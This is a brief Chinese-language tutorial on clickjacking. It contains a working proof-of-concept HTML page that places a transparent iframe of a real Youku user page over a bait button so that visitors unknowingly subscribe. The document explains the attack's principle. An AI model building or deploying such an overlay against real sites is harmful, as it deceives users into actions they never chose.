百度解釋：

點選劫持，clickjacking，也被稱為UI-覆蓋攻擊。這個詞首次出現在2008年，是由網際網路安全專家羅伯特·漢森和耶利米·格勞斯曼首創的。 它是通過覆蓋不可見的框架誤導受害者點選。 雖然受害者點選的是他所看到的網頁，但其實他所點選的是被黑客精心構建的另一個置於原網頁上面的透明頁面。 這種攻擊利用了HTML中<iframe>標籤的透明屬性。 就像一張圖片上面鋪了一層透明的紙一樣，你看到的是黑客的頁面，但是其實這個頁面只是在底部，而你真正點選的是被黑客透明化的另一個網頁。一個簡單的點選劫持例子，就是當你點選了一個不明連結之後，自動關注了某一個人的部落格或者訂閱了視訊。 假如我在優酷釋出了很多視訊，想讓更多的人關注它，於是我們準備了一個頁面：

<!DOCTYPE html>
<html>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<head>
<title>點選劫持 POC</title>
<style>
iframe {
width: 1440px;
height: 900px;
position: absolute;
top: -0px;
left: -0px;
z-index: 2;
-moz-opacity: 0;
opacity: 0;
filter: alpha(opacity=0);
}
button {
position: absolute;
top: 270px;
left: 1150px;
z-index: 1;
width: 90px;
height:40px;
}
</style>
</head>
<body>
<button>美女圖片</button>
<img src="http://pic1.win4000.com/wallpaper/2018-03-19/5aaf2bf0122d2.jpg">
<iframe src="http://i.youku.com/u/UMjA0NTg4Njcy" scrolling="no"></iframe>
</body>
</html>
 

當然真正的頁面肯定會更精緻一些，不會這麼簡陋。 然而這個頁面只是表象而已，我們把iframe的透明度改成0.3以後再看看
當你點選按鈕以後，真正的點選的其實是隱藏的那個頁面的訂閱按鈕，然後就會在你不知情的情況下訂閱了
當然點選劫持的危害可大可小，並不僅僅是關注訂閱之類的東西，但是原理類似。